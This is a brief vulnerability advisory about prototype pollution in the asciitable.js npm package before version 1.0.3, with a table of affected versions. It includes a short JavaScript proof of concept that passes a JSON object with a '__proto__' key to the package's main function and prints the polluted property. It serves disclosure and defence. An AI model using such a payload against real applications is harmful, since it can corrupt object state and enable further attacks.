The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function.
var a = require("asciitable.js");
var b = JSON.parse('{"__proto__":{"test":123}}');
a({},b);
console.log({}.test)
CPE | Name | Operator | Version |
---|---|---|---|
asciitable.js | lt | 1.0.3 |